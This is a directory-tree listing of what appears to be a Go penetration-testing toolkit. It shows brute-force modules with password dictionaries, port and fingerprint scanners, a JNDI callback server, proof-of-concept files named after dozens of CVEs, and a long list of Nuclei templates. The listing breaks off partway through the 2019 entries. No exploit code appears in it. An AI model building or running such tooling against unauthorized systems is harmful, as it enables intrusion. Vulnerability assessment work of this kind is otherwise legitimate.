├── .github ├── build │ ├── linux.yml │ ├── mac.yml │ └── windows.yml └── workflows │ └── build.yml ├── .gitignore ├── LICENSE ├── README.md ├── brute ├── admin_brute.go ├── basic_brute.go ├── check_loginpage.go ├── dicts.go ├── dicts │ ├── filedic.txt │ ├── jbossuserpass.txt │ ├── tomcatuserpass.txt │ ├── top100pass.txt │ └── weblogicuserpass.txt ├── filefuzz.go ├── fuzzfingerprints.go ├── jboss_brute.go ├── tomcat_brute.go └── weblogic_brute.go ├── go.mod ├── go.sum ├── main.go ├── pkg ├── fingerprint │ ├── dicts │ │ ├── eHoleFinger.json │ │ └── localFinger.json │ ├── eHoleFingerData.go │ ├── fingerScan.go │ ├── getFavicon.go │ ├── loadFinger.go │ ├── localFingerData.go │ └── matchfinger.go ├── httpx │ ├── common │ │ ├── customheader │ │ │ ├── customheader.go │ │ │ └── doc.go │ │ ├── customlist │ │ │ ├── customlist.go │ │ │ └── doc.go │ │ ├── customports │ │ │ ├── customport.go │ │ │ └── doc.go │ │ ├── fileutil │ │ │ ├── doc.go │ │ │ └── fileutil.go │ │ ├── hashes │ │ │ ├── doc.go │ │ │ ├── hashes.go │ │ │ └── jarmhash.go │ │ ├── httputilz │ │ │ ├── doc.go │ │ │ └── httputilz.go │ │ ├── httpx │ │ │ ├── cdn.go │ │ │ ├── csp.go │ │ │ ├── doc.go │ │ │ ├── encodings.go │ │ │ ├── filter.go │ │ │ ├── http2.go │ │ │ ├── httpx.go │ │ │ ├── option.go │ │ │ ├── pipeline.go │ │ │ ├── response.go │ │ │ ├── title.go │ │ │ ├── tls.go │ │ │ └── virtualhost.go │ │ ├── regexhelper │ │ │ └── regex.go │ │ ├── slice │ │ │ ├── doc.go │ │ │ └── slice.go │ │ └── stringz │ │ │ ├── doc.go │ │ │ └── stringz.go │ ├── internal │ │ └── testutils │ │ │ └── integration.go │ └── runner │ │ ├── banner.go │ │ ├── doc.go │ │ ├── options.go │ │ ├── resume.go │ │ └── runner.go ├── jndi │ ├── jndilog.go │ └── server.go ├── log.go ├── naabu │ └── v2 │ │ └── pkg │ │ ├── privileges │ │ ├── privileges.go │ │ ├── privileges_darwin.go │ │ ├── privileges_linux.go │ │ └── privileges_win.go │ │ ├── result │ │ ├── results.go │ │ └── results_test.go │ │ ├── runner │ │ ├── banners.go │ │ ├── banners_test.go │ │ ├── default.go │ │ ├── ips.go │ │ ├── ips_test.go │ │ ├── nmap.go │ │ ├── nmap_test.go │ │ ├── options.go │ │ ├── output.go │ │ ├── output_test.go │ │ ├── ports.go │ │ ├── ports_test.go │ │ ├── resume.go │ │ ├── runner.go │ │ ├── targets.go │ │ ├── util.go │ │ ├── util_test.go │ │ ├── validate.go │ │ └── validate_test.go │ │ └── scan │ │ ├── cdn.go │ │ ├── cdn_test.go │ │ ├── connect.go │ │ ├── connect_test.go │ │ ├── externalip.go │ │ ├── externalip_test.go │ │ ├── option.go │ │ ├── ping.go │ │ ├── ping_test.go │ │ ├── scan.go │ │ ├── scan_unix.go │ │ ├── tcpsequencer.go │ │ └── tcpsequencer_test.go └── util.go ├── pocs_go ├── Springboot │ ├── CVE-2022-22947.go │ └── CVE-2022-22965.go ├── ThinkPHP │ └── check.go ├── confluence │ ├── CVE-2021-26085.go │ ├── CVE_2021_26084.go │ ├── CVE_2022_26134.go │ └── CVE_2022_26318.go ├── f5 │ ├── CVE_2020_5902.go │ ├── CVE_2021_22986.go │ └── CVE_2022_1388.go ├── fastjson │ ├── check.go │ └── payloads.go ├── gitlab │ └── CVE_2021_22205.go ├── go_poc_check.go ├── jboss │ └── CVE_2017_12149.go ├── jenkins │ ├── CVE_2018_1000110.go │ ├── CVE_2018_1000861.go │ ├── CVE_2019_1003000.go │ └── Unauthorized.go ├── landray │ └── Landray_RCE.go ├── log4j │ ├── check.go │ └── payloads.go ├── mcms │ └── Front_Desk_sqlinject.go ├── phpunit │ └── CVE_2017_9841.go ├── seeyon │ ├── BackdoorScan.go │ ├── CNVD_2019_19299.go │ ├── CNVD_2020_62422.go │ ├── CNVD_2021_01627.go │ ├── CreateMysql.go │ ├── DownExcelBeanServlet.go │ ├── GetSessionList.go │ ├── InitDataAssess.go │ ├── ManagementStatus.go │ ├── SeeyonFastjson.go │ ├── SessionUpload.go │ └── sql.go ├── shiro │ ├── CVE_2016_4437.go │ └── dicts │ │ └── keys.txt ├── spark │ └── CVE_2022_33891.go ├── sunlogin │ └── RCE.go ├── tomcat │ ├── CVE_2017_12615.go │ └── CVE_2020_1938.go ├── tongda │ ├── api_ali_php_any_fileUpload.go │ ├── file_delete.go │ └── get_user_session.go ├── weblogic │ ├── CVE_2014_4210.go │ ├── CVE_2017_10271.go │ ├── CVE_2017_3506.go │ ├── CVE_2018_2894.go │ ├── CVE_2019_2725.go │ ├── CVE_2019_2729.go │ ├── CVE_2020_14882.go │ ├── CVE_2020_14883.go │ ├── CVE_2020_2883.go │ └── CVE_2021_2109.go ├── zabbix │ └── CVE-2022-23131.go └── zentao │ └── CNVD_2022_42853.go ├── pocs_yml ├── check │ ├── nucleiCheck.go │ └── xrayCheck.go ├── nucleiFiles │ ├── cnvd │ │ ├── 2018 │ │ │ └── CNVD-2018-13393.yaml │ │ ├── 2019 │ │ │ ├── CNVD-2019-01348.yaml │ │ │ ├── CNVD-2019-06255.yaml │ │ │ ├── CNVD-2019-19299.yaml │ │ │ └── CNVD-2019-32204.yaml │ │ ├── 2020 │ │ │ ├── CNVD-2020-23735.yaml │ │ │ ├── CNVD-2020-46552.yaml │ │ │ ├── CNVD-2020-56167.yaml │ │ │ ├── CNVD-2020-62422.yaml │ │ │ ├── CNVD-2020-67113.yaml │ │ │ └── CNVD-2020-68596.yaml │ │ ├── 2021 │ │ │ ├── CNVD-2021-01931.yaml │ │ │ ├── CNVD-2021-09650.yaml │ │ │ ├── CNVD-2021-10543.yaml │ │ │ ├── CNVD-2021-14536.yaml │ │ │ ├── CNVD-2021-15822.yaml │ │ │ ├── CNVD-2021-15824.yaml │ │ │ ├── CNVD-2021-17369.yaml │ │ │ ├── CNVD-2021-26422.yaml │ │ │ ├── CNVD-2021-28277.yaml │ │ │ ├── CNVD-2021-30167.yaml │ │ │ └── CNVD-2021-49104.yaml │ │ └── 2022 │ │ │ └── CNVD-2022-03672.yaml │ ├── cves │ │ ├── 2000 │ │ │ └── CVE-2000-0114.yaml │ │ ├── 2001 │ │ │ └── CVE-2001-1473.yaml │ │ ├── 2002 │ │ │ └── CVE-2002-1131.yaml │ │ ├── 2004 │ │ │ └── CVE-2004-0519.yaml │ │ ├── 2005 │ │ │ ├── CVE-2005-2428.yaml │ │ │ ├── CVE-2005-3344.yaml │ │ │ └── CVE-2005-4385.yaml │ │ ├── 2006 │ │ │ ├── CVE-2006-1681.yaml │ │ │ └── CVE-2006-2842.yaml │ │ ├── 2007 │ │ │ ├── CVE-2007-0885.yaml │ │ │ ├── CVE-2007-4504.yaml │ │ │ ├── CVE-2007-4556.yaml │ │ │ └── CVE-2007-5728.yaml │ │ ├── 2008 │ │ │ ├── CVE-2008-2398.yaml │ │ │ ├── CVE-2008-2650.yaml │ │ │ ├── CVE-2008-4668.yaml │ │ │ ├── CVE-2008-4764.yaml │ │ │ ├── CVE-2008-5587.yaml │ │ │ ├── CVE-2008-6080.yaml │ │ │ ├── CVE-2008-6172.yaml │ │ │ ├── CVE-2008-6222.yaml │ │ │ └── CVE-2008-6668.yaml │ │ ├── 2009 │ │ │ ├── CVE-2009-0545.yaml │ │ │ ├── CVE-2009-0932.yaml │ │ │ ├── CVE-2009-1151.yaml │ │ │ ├── CVE-2009-1496.yaml │ │ │ ├── CVE-2009-1558.yaml │ │ │ ├── CVE-2009-1872.yaml │ │ │ ├── CVE-2009-2015.yaml │ │ │ ├── CVE-2009-2100.yaml │ │ │ ├── CVE-2009-3053.yaml │ │ │ ├── CVE-2009-3318.yaml │ │ │ ├── CVE-2009-4202.yaml │ │ │ ├── CVE-2009-4223.yaml │ │ │ ├── CVE-2009-4679.yaml │ │ │ ├── CVE-2009-5020.yaml │ │ │ └── CVE-2009-5114.yaml │ │ ├── 2010 │ │ │ ├── CVE-2010-0157.yaml │ │ │ ├── CVE-2010-0219.yaml │ │ │ ├── CVE-2010-0467.yaml │ │ │ ├── CVE-2010-0696.yaml │ │ │ ├── CVE-2010-0759.yaml │ │ │ ├── CVE-2010-0942.yaml │ │ │ ├── CVE-2010-0943.yaml │ │ │ ├── CVE-2010-0944.yaml │ │ │ ├── CVE-2010-0972.yaml │ │ │ ├── CVE-2010-0982.yaml │ │ │ ├── CVE-2010-0985.yaml │ │ │ ├── CVE-2010-1056.yaml │ │ │ ├── CVE-2010-1081.yaml │ │ │ ├── CVE-2010-1217.yaml │ │ │ ├── CVE-2010-1219.yaml │ │ │ ├── CVE-2010-1302.yaml │ │ │ ├── CVE-2010-1304.yaml │ │ │ ├── CVE-2010-1305.yaml │ │ │ ├── CVE-2010-1306.yaml │ │ │ ├── CVE-2010-1307.yaml │ │ │ ├── CVE-2010-1308.yaml │ │ │ ├── CVE-2010-1312.yaml │ │ │ ├── CVE-2010-1313.yaml │ │ │ ├── CVE-2010-1314.yaml │ │ │ ├── CVE-2010-1315.yaml │ │ │ ├── CVE-2010-1340.yaml │ │ │ ├── CVE-2010-1345.yaml │ │ │ ├── CVE-2010-1352.yaml │ │ │ ├── CVE-2010-1353.yaml │ │ │ ├── CVE-2010-1354.yaml │ │ │ ├── CVE-2010-1461.yaml │ │ │ ├── CVE-2010-1469.yaml │ │ │ ├── CVE-2010-1470.yaml │ │ │ ├── CVE-2010-1471.yaml │ │ │ ├── CVE-2010-1472.yaml │ │ │ ├── CVE-2010-1473.yaml │ │ │ ├── CVE-2010-1474.yaml │ │ │ ├── CVE-2010-1475.yaml │ │ │ ├── CVE-2010-1476.yaml │ │ │ ├── CVE-2010-1478.yaml │ │ │ ├── CVE-2010-1491.yaml │ │ │ ├── CVE-2010-1494.yaml │ │ │ ├── CVE-2010-1495.yaml │ │ │ ├── CVE-2010-1531.yaml │ │ │ ├── CVE-2010-1532.yaml │ │ │ ├── CVE-2010-1533.yaml │ │ │ ├── CVE-2010-1534.yaml │ │ │ ├── CVE-2010-1535.yaml │ │ │ ├── CVE-2010-1540.yaml │ │ │ ├── CVE-2010-1601.yaml │ │ │ ├── CVE-2010-1602.yaml │ │ │ ├── CVE-2010-1603.yaml │ │ │ ├── CVE-2010-1607.yaml │ │ │ ├── CVE-2010-1653.yaml │ │ │ ├── CVE-2010-1657.yaml │ │ │ ├── CVE-2010-1658.yaml │ │ │ ├── CVE-2010-1659.yaml │ │ │ ├── CVE-2010-1714.yaml │ │ │ ├── CVE-2010-1715.yaml │ │ │ ├── CVE-2010-1717.yaml │ │ │ ├── CVE-2010-1718.yaml │ │ │ ├── CVE-2010-1719.yaml │ │ │ ├── CVE-2010-1722.yaml │ │ │ ├── CVE-2010-1723.yaml │ │ │ ├── CVE-2010-1858.yaml │ │ │ ├── CVE-2010-1870.yaml │ │ │ ├── CVE-2010-1875.yaml │ │ │ ├── CVE-2010-1878.yaml │ │ │ ├── CVE-2010-1952.yaml │ │ │ ├── CVE-2010-1953.yaml │ │ │ ├── CVE-2010-1954.yaml │ │ │ ├── CVE-2010-1955.yaml │ │ │ ├── CVE-2010-1956.yaml │ │ │ ├── CVE-2010-1957.yaml │ │ │ ├── CVE-2010-1977.yaml │ │ │ ├── CVE-2010-1979.yaml │ │ │ ├── CVE-2010-1980.yaml │ │ │ ├── CVE-2010-1981.yaml │ │ │ ├── CVE-2010-1982.yaml │ │ │ ├── CVE-2010-1983.yaml │ │ │ ├── CVE-2010-2033.yaml │ │ │ ├── CVE-2010-2034.yaml │ │ │ ├── CVE-2010-2035.yaml │ │ │ ├── CVE-2010-2036.yaml │ │ │ ├── CVE-2010-2037.yaml │ │ │ ├── CVE-2010-2045.yaml │ │ │ ├── CVE-2010-2050.yaml │ │ │ ├── CVE-2010-2122.yaml │ │ │ ├── CVE-2010-2128.yaml │ │ │ ├── CVE-2010-2259.yaml │ │ │ ├── CVE-2010-2307.yaml │ │ │ ├── CVE-2010-2507.yaml │ │ │ ├── CVE-2010-2680.yaml │ │ │ ├── CVE-2010-2682.yaml │ │ │ ├── CVE-2010-2857.yaml │ │ │ ├── CVE-2010-2861.yaml │ │ │ ├── CVE-2010-2918.yaml │ │ │ ├── CVE-2010-2920.yaml │ │ │ ├── CVE-2010-3203.yaml │ │ │ ├── CVE-2010-3426.yaml │ │ │ ├── CVE-2010-4231.yaml │ │ │ ├── CVE-2010-4239.yaml │ │ │ ├── CVE-2010-4282.yaml │ │ │ ├── CVE-2010-4617.yaml │ │ │ ├── CVE-2010-4719.yaml │ │ │ ├── CVE-2010-4769.yaml │ │ │ ├── CVE-2010-4977.yaml │ │ │ ├── CVE-2010-5028.yaml │ │ │ ├── CVE-2010-5278.yaml │ │ │ └── CVE-2010-5286.yaml │ │ ├── 2011 │ │ │ ├── CVE-2011-0049.yaml │ │ │ ├── CVE-2011-1669.yaml │ │ │ ├── CVE-2011-2744.yaml │ │ │ ├── CVE-2011-2780.yaml │ │ │ ├── CVE-2011-3315.yaml │ │ │ ├── CVE-2011-4336.yaml │ │ │ ├── CVE-2011-4618.yaml │ │ │ ├── CVE-2011-4624.yaml │ │ │ ├── CVE-2011-4804.yaml │ │ │ ├── CVE-2011-4926.yaml │ │ │ ├── CVE-2011-5106.yaml │ │ │ ├── CVE-2011-5107.yaml │ │ │ ├── CVE-2011-5179.yaml │ │ │ ├── CVE-2011-5181.yaml │ │ │ └── CVE-2011-5265.yaml │ │ ├── 2012 │ │ │ ├── CVE-2012-0392.yaml │ │ │ ├── CVE-2012-0896.yaml │ │ │ ├── CVE-2012-0901.yaml │ │ │ ├── CVE-2012-0981.yaml │ │ │ ├── CVE-2012-0991.yaml │ │ │ ├── CVE-2012-0996.yaml │ │ │ ├── CVE-2012-1226.yaml │ │ │ ├── CVE-2012-1823.yaml │ │ │ ├── CVE-2012-1835.yaml │ │ │ ├── CVE-2012-2371.yaml │ │ │ ├── CVE-2012-3153.yaml │ │ │ ├── CVE-2012-4242.yaml │ │ │ ├── CVE-2012-4253.yaml │ │ │ ├── CVE-2012-4273.yaml │ │ │ ├── CVE-2012-4547.yaml │ │ │ ├── CVE-2012-4768.yaml │ │ │ ├── CVE-2012-4878.yaml │ │ │ ├── CVE-2012-4889.yaml │ │ │ ├── CVE-2012-4940.yaml │ │ │ └── CVE-2012-5913.yaml │ │ ├── 2013 │ │ │ ├── CVE-2013-1965.yaml │ │ │ ├── CVE-2013-2248.yaml │ │ │ ├── CVE-2013-2251.yaml │ │ │ ├── CVE-2013-2287.yaml │ │ │ ├── CVE-2013-3526.yaml │ │ │ ├── CVE-2013-3827.yaml │ │ │ ├── CVE-2013-4117.yaml │ │ │ ├── CVE-2013-4625.yaml │ │ │ ├── CVE-2013-5528.yaml │ │ │ ├── CVE-2013-5979.yaml │ │ │ ├── CVE-2013-6281.yaml │ │ │ ├── CVE-2013-7091.yaml │ │ │ └── CVE-2013-7240.yaml │ │ ├── 2014 │ │ │ ├── CVE-2014-10037.yaml │ │ │ ├── CVE-2014-2321.yaml │ │ │ ├── CVE-2014-2323.yaml │ │ │ ├── CVE-2014-2383.yaml │ │ │ ├── CVE-2014-2908.yaml │ │ │ ├── CVE-2014-2962.yaml │ │ │ ├── CVE-2014-3120.yaml │ │ │ ├── CVE-2014-3206.yaml │ │ │ ├── CVE-2014-3704.yaml │ │ │ ├── CVE-2014-3744.yaml │ │ │ ├── CVE-2014-4210.yaml │ │ │ ├── CVE-2014-4513.yaml │ │ │ ├── CVE-2014-4535.yaml │ │ │ ├── CVE-2014-4536.yaml │ │ │ ├── CVE-2014-4539.yaml │ │ │ ├── CVE-2014-4544.yaml │ │ │ ├── CVE-2014-4550.yaml │ │ │ ├── CVE-2014-4558.yaml │ │ │ ├── CVE-2014-4561.yaml │ │ │ ├── CVE-2014-4592.yaml │ │ │ ├── CVE-2014-4940.yaml │ │ │ ├── CVE-2014-5111.yaml │ │ │ ├── CVE-2014-5258.yaml │ │ │ ├── CVE-2014-5368.yaml │ │ │ ├── CVE-2014-6271.yaml │ │ │ ├── CVE-2014-6308.yaml │ │ │ ├── CVE-2014-8682.yaml │ │ │ ├── CVE-2014-8799.yaml │ │ │ ├── CVE-2014-9094.yaml │ │ │ ├── CVE-2014-9444.yaml │ │ │ ├── CVE-2014-9606.yaml │ │ │ ├── CVE-2014-9607.yaml │ │ │ ├── CVE-2014-9608.yaml │ │ │ ├── CVE-2014-9609.yaml │ │ │ ├── CVE-2014-9614.yaml │ │ │ ├── CVE-2014-9615.yaml │ │ │ ├── CVE-2014-9617.yaml │ │ │ └── CVE-2014-9618.yaml │ │ ├── 2015 │ │ │ ├── CVE-2015-0554.yaml │ │ │ ├── CVE-2015-1000012.yaml │ │ │ ├── CVE-2015-1427.yaml │ │ │ ├── CVE-2015-1503.yaml │ │ │ ├── CVE-2015-1880.yaml │ │ │ ├── CVE-2015-2067.yaml │ │ │ ├── CVE-2015-2068.yaml │ │ │ ├── CVE-2015-2080.yaml │ │ │ ├── CVE-2015-2166.yaml │ │ │ ├── CVE-2015-2807.yaml │ │ │ ├── CVE-2015-3224.yaml │ │ │ ├── CVE-2015-3306.yaml │ │ │ ├── CVE-2015-3337.yaml │ │ │ ├── CVE-2015-3648.yaml │ │ │ ├── CVE-2015-3897.yaml │ │ │ ├── CVE-2015-4050.yaml │ │ │ ├── CVE-2015-4414.yaml │ │ │ ├── CVE-2015-4632.yaml │ │ │ ├── CVE-2015-4694.yaml │ │ │ ├── CVE-2015-5354.yaml │ │ │ ├── CVE-2015-5461.yaml │ │ │ ├── CVE-2015-5471.yaml │ │ │ ├── CVE-2015-5531.yaml │ │ │ ├── CVE-2015-5688.yaml │ │ │ ├── CVE-2015-6477.yaml │ │ │ ├── CVE-2015-6544.yaml │ │ │ ├── CVE-2015-6920.yaml │ │ │ ├── CVE-2015-7297.yaml │ │ │ ├── CVE-2015-7377.yaml │ │ │ ├── CVE-2015-7450.yaml │ │ │ ├── CVE-2015-7780.yaml │ │ │ ├── CVE-2015-7823.yaml │ │ │ ├── CVE-2015-8349.yaml │ │ │ ├── CVE-2015-8399.yaml │ │ │ ├── CVE-2015-8813.yaml │ │ │ ├── CVE-2015-9414.yaml │ │ │ └── CVE-2015-9480.yaml │ │ ├── 2016 │ │ │ ├── CVE-2016-0957.yaml │ │ │ ├── CVE-2016-1000126.yaml │ │ │ ├── CVE-2016-1000127.yaml │ │ │ ├── CVE-2016-1000128.yaml │ │ │ ├── CVE-2016-1000129.yaml │ │ │ ├── CVE-2016-1000130.yaml │ │ │ ├── CVE-2016-1000131.yaml │ │ │ ├── CVE-2016-1000132.yaml │ │ │ ├── CVE-2016-1000133.yaml │ │ │ ├── CVE-2016-1000134.yaml │ │ │ ├── CVE-2016-1000135.yaml │ │ │ ├── CVE-2016-1000136.yaml │ │ │ ├── CVE-2016-1000137.yaml │ │ │ ├── CVE-2016-1000138.yaml │ │ │ ├── CVE-2016-1000139.yaml │ │ │ ├── CVE-2016-1000140.yaml │ │ │ ├── CVE-2016-1000141.yaml │ │ │ ├── CVE-2016-1000142.yaml │ │ │ ├── CVE-2016-1000143.yaml │ │ │ ├── CVE-2016-1000146.yaml │ │ │ ├── CVE-2016-1000148.yaml │ │ │ ├── CVE-2016-1000149.yaml │ │ │ ├── CVE-2016-1000152.yaml │ │ │ ├── CVE-2016-1000153.yaml │ │ │ ├── CVE-2016-1000154.yaml │ │ │ ├── CVE-2016-1000155.yaml │ │ │ ├── CVE-2016-10033.yaml │ │ │ ├── CVE-2016-10134.yaml │ │ │ ├── CVE-2016-10924.yaml │ │ │ ├── CVE-2016-10940.yaml │ │ │ ├── CVE-2016-10956.yaml │ │ │ ├── CVE-2016-10960.yaml │ │ │ ├── CVE-2016-10993.yaml │ │ │ ├── CVE-2016-1555.yaml │ │ │ ├── CVE-2016-2004.yaml │ │ │ ├── CVE-2016-2389.yaml │ │ │ ├── CVE-2016-3081.yaml │ │ │ ├── CVE-2016-3088.yaml │ │ │ ├── CVE-2016-3978.yaml │ │ │ ├── CVE-2016-4975.yaml │ │ │ ├── CVE-2016-4977.yaml │ │ │ ├── CVE-2016-5649.yaml │ │ │ ├── CVE-2016-6210.yaml │ │ │ ├── CVE-2016-6277.yaml │ │ │ ├── CVE-2016-7552.yaml │ │ │ ├── CVE-2016-7981.yaml │ │ │ └── CVE-2016-8527.yaml │ │ ├── 2017 │ │ │ ├── CVE-2017-0929.yaml │ │ │ ├── CVE-2017-1000028.yaml │ │ │ ├── CVE-2017-1000029.yaml │ │ │ ├── CVE-2017-1000170.yaml │ │ │ ├── CVE-2017-1000486.yaml │ │ │ ├── CVE-2017-10075.yaml │ │ │ ├── CVE-2017-10271.yaml │ │ │ ├── CVE-2017-10974.yaml │ │ │ ├── CVE-2017-11444.yaml │ │ │ ├── CVE-2017-11512.yaml │ │ │ ├── CVE-2017-11610.yaml │ │ │ ├── CVE-2017-12138.yaml │ │ │ ├── CVE-2017-12149.yaml │ │ │ ├── CVE-2017-12542.yaml │ │ │ ├── CVE-2017-12544.yaml │ │ │ ├── CVE-2017-12583.yaml │ │ │ ├── CVE-2017-12611.yaml │ │ │ ├── CVE-2017-12615.yaml │ │ │ ├── CVE-2017-12629.yaml │ │ │ ├── CVE-2017-12635.yaml │ │ │ ├── CVE-2017-12637.yaml │ │ │ ├── CVE-2017-12794.yaml │ │ │ ├── CVE-2017-14135.yaml │ │ │ ├── CVE-2017-14535.yaml │ │ │ ├── CVE-2017-14537.yaml │ │ │ ├── CVE-2017-14651.yaml │ │ │ ├── CVE-2017-14849.yaml │ │ │ ├── CVE-2017-15287.yaml │ │ │ ├── CVE-2017-15363.yaml │ │ │ ├── CVE-2017-15647.yaml │ │ │ ├── CVE-2017-15715.yaml │ │ │ ├── CVE-2017-15944.yaml │ │ │ ├── CVE-2017-16806.yaml │ │ │ ├── CVE-2017-16877.yaml │ │ │ ├── CVE-2017-17043.yaml │ │ │ ├── CVE-2017-17059.yaml │ │ │ ├── CVE-2017-17451.yaml │ │ │ ├── CVE-2017-17562.yaml │ │ │ ├── CVE-2017-18024.yaml │ │ │ ├── CVE-2017-18536.yaml │ │ │ ├── CVE-2017-18598.yaml │ │ │ ├── CVE-2017-18638.yaml │ │ │ ├── CVE-2017-3506.yaml │ │ │ ├── CVE-2017-3528.yaml │ │ │ ├── CVE-2017-3881.yaml │ │ │ ├── CVE-2017-4011.yaml │ │ │ ├── CVE-2017-5487.yaml │ │ │ ├── CVE-2017-5521.yaml │ │ │ ├── CVE-2017-5631.yaml │ │ │ ├── CVE-2017-5638.yaml │ │ │ ├── CVE-2017-5982.yaml │ │ │ ├── CVE-2017-6090.yaml │ │ │ ├── CVE-2017-7269.yaml │ │ │ ├── CVE-2017-7391.yaml │ │ │ ├── CVE-2017-7615.yaml │ │ │ ├── CVE-2017-7921.yaml │ │ │ ├── CVE-2017-8917.yaml │ │ │ ├── CVE-2017-9140.yaml │ │ │ ├── CVE-2017-9288.yaml │ │ │ ├── CVE-2017-9506.yaml │ │ │ ├── CVE-2017-9791.yaml │ │ │ ├── CVE-2017-9805.yaml │ │ │ ├── CVE-2017-9822.yaml │ │ │ ├── CVE-2017-9833.yaml │ │ │ └── CVE-2017-9841.yaml │ │ ├── 2018 │ │ │ ├── CVE-2018-0127.yaml │ │ │ ├── CVE-2018-0296.yaml │ │ │ ├── CVE-2018-1000129.yaml │ │ │ ├── CVE-2018-1000130.yaml │ │ │ ├── CVE-2018-1000226.yaml │ │ │ ├── CVE-2018-1000533.yaml │ │ │ ├── CVE-2018-1000600.yaml │ │ │ ├── CVE-2018-1000861.yaml │ │ │ ├── CVE-2018-10093.yaml │ │ │ ├── CVE-2018-10095.yaml │ │ │ ├── CVE-2018-10141.yaml │ │ │ ├── CVE-2018-10201.yaml │ │ │ ├── CVE-2018-10230.yaml │ │ │ ├── CVE-2018-10562.yaml │ │ │ ├── CVE-2018-10818.yaml │ │ │ ├── CVE-2018-10822.yaml │ │ │ ├── CVE-2018-10823.yaml │ │ │ ├── CVE-2018-10956.yaml │ │ │ ├── CVE-2018-11231.yaml │ │ │ ├── CVE-2018-11409.yaml │ │ │ ├── CVE-2018-11709.yaml │ │ │ ├── CVE-2018-11759.yaml │ │ │ ├── CVE-2018-11776.yaml │ │ │ ├── CVE-2018-11784.yaml │ │ │ ├── CVE-2018-12031.yaml │ │ │ ├── CVE-2018-12054.yaml │ │ │ ├── CVE-2018-1207.yaml │ │ │ ├── CVE-2018-12095.yaml │ │ │ ├── CVE-2018-12296.yaml │ │ │ ├── CVE-2018-12300.yaml │ │ │ ├── CVE-2018-12613.yaml │ │ │ ├── CVE-2018-12634.yaml │ │ │ ├── CVE-2018-12675.yaml │ │ │ ├── CVE-2018-1271.yaml │ │ │ ├── CVE-2018-1273.yaml │ │ │ ├── CVE-2018-12998.yaml │ │ │ ├── CVE-2018-1335.yaml │ │ │ ├── CVE-2018-13379.yaml │ │ │ ├── CVE-2018-13380.yaml │ │ │ ├── CVE-2018-13980.yaml │ │ │ ├── CVE-2018-14013.yaml │ │ │ ├── CVE-2018-14064.yaml │ │ │ ├── CVE-2018-14474.yaml │ │ │ ├── CVE-2018-14574.yaml │ │ │ ├── CVE-2018-14728.yaml │ │ │ ├── CVE-2018-14912.yaml │ │ │ ├── CVE-2018-14916.yaml │ │ │ ├── CVE-2018-14931.yaml │ │ │ ├── CVE-2018-15138.yaml │ │ │ ├── CVE-2018-15473.yaml │ │ │ ├── CVE-2018-15517.yaml │ │ │ ├── CVE-2018-15535.yaml │ │ │ ├── CVE-2018-15745.yaml │ │ │ ├── CVE-2018-15961.yaml │ │ │ ├── CVE-2018-16059.yaml │ │ │ ├── CVE-2018-16133.yaml │ │ │ ├── CVE-2018-16167.yaml │ │ │ ├── CVE-2018-16283.yaml │ │ │ ├── CVE-2018-16288.yaml │ │ │ ├── CVE-2018-16299.yaml │ │ │ ├── CVE-2018-16341.yaml │ │ │ ├── CVE-2018-16668.yaml │ │ │ ├── CVE-2018-16670.yaml │ │ │ ├── CVE-2018-16671.yaml │ │ │ ├── CVE-2018-16716.yaml │ │ │ ├── CVE-2018-16761.yaml │ │ │ ├── CVE-2018-16763.yaml │ │ │ ├── CVE-2018-16836.yaml │ │ │ ├── CVE-2018-17246.yaml │ │ │ ├── CVE-2018-17254.yaml │ │ │ ├── CVE-2018-17422.yaml │ │ │ ├── CVE-2018-17431.yaml │ │ │ ├── CVE-2018-18069.yaml │ │ │ ├── CVE-2018-18264.yaml │ │ │ ├── CVE-2018-18323.yaml │ │ │ ├── CVE-2018-18570.yaml │ │ │ ├── CVE-2018-18608.yaml │ │ │ ├── CVE-2018-18775.yaml │ │ │ ├── CVE-2018-18777.yaml │ │ │ ├── CVE-2018-18778.yaml │ │ │ ├── CVE-2018-18925.yaml │ │ │ ├── CVE-2018-19326.yaml │ │ │ ├── CVE-2018-19365.yaml │ │ │ ├── CVE-2018-19386.yaml │ │ │ ├── CVE-2018-19439.yaml │ │ │ ├── CVE-2018-19458.yaml │ │ │ ├── CVE-2018-19753.yaml │ │ │ ├── CVE-2018-20462.yaml │ │ │ ├── CVE-2018-20470.yaml │ │ │ ├── CVE-2018-20824.yaml │ │ │ ├── CVE-2018-20985.yaml │ │ │ ├── CVE-2018-2392.yaml │ │ │ ├── CVE-2018-2628.yaml │ │ │ ├── CVE-2018-2791.yaml │ │ │ ├── CVE-2018-2893.yaml │ │ │ ├── CVE-2018-2894.yaml │ │ │ ├── CVE-2018-3167.yaml │ │ │ ├── CVE-2018-3238.yaml │ │ │ ├── CVE-2018-3714.yaml │ │ │ ├── CVE-2018-3760.yaml │ │ │ ├── CVE-2018-3810.yaml │ │ │ ├── CVE-2018-5230.yaml │ │ │ ├── CVE-2018-5233.yaml │ │ │ ├── CVE-2018-5316.yaml │ │ │ ├── CVE-2018-5715.yaml │ │ │ ├── CVE-2018-6008.yaml │ │ │ ├── CVE-2018-6200.yaml │ │ │ ├── CVE-2018-6910.yaml │ │ │ ├── CVE-2018-7251.yaml │ │ │ ├── CVE-2018-7422.yaml │ │ │ ├── CVE-2018-7467.yaml │ │ │ ├── CVE-2018-7490.yaml │ │ │ ├── CVE-2018-7600.yaml │ │ │ ├── CVE-2018-7602.yaml │ │ │ ├── CVE-2018-7662.yaml │ │ │ ├── CVE-2018-7700.yaml │ │ │ ├── CVE-2018-7719.yaml │ │ │ ├── CVE-2018-8006.yaml │ │ │ ├── CVE-2018-8033.yaml │ │ │ ├── CVE-2018-8715.yaml │ │ │ ├── CVE-2018-8719.yaml │ │ │ ├── CVE-2018-8727.yaml │ │ │ ├── CVE-2018-8770.yaml │ │ │ ├── CVE-2018-9118.yaml │ │ │ ├── CVE-2018-9161.yaml │ │ │ ├── CVE-2018-9205.yaml │ │ │ ├── CVE-2018-9845.yaml │ │ │ └── CVE-2018-9995.yaml │ │ ├── 2019 │ │ │ ├── CVE-2019-0193.yaml │ │ │ ├── CVE-2019-0221.yaml │ │ │ ├── CVE-2019-0230.yaml │ │ │ ├── CVE-2019-10068.yaml │ │ │ ├── CVE-2019-10092.yaml │ │ │ ├── CVE-2019-1010287.yaml │ │ │ ├── CVE-2019-1010290.yaml │ │ │ ├── CVE-2019-10232.yaml │ │ │ ├── CVE-2019-10405.yaml │ │ │ ├── CVE-2019-10475.yaml │ │ │ ├── CVE-2019-10758.yaml │ │ │ ├── CVE-2019-11013.yaml │ │ │ ├── CVE-2019-11248.yaml │ │ │ ├── CVE-2019-11510.yaml │ │ │ ├── CVE-2019-11580.yaml │ │ │ ├── CVE-2019-11581.yaml │ │ │ ├── CVE-2019-11869.yaml │ 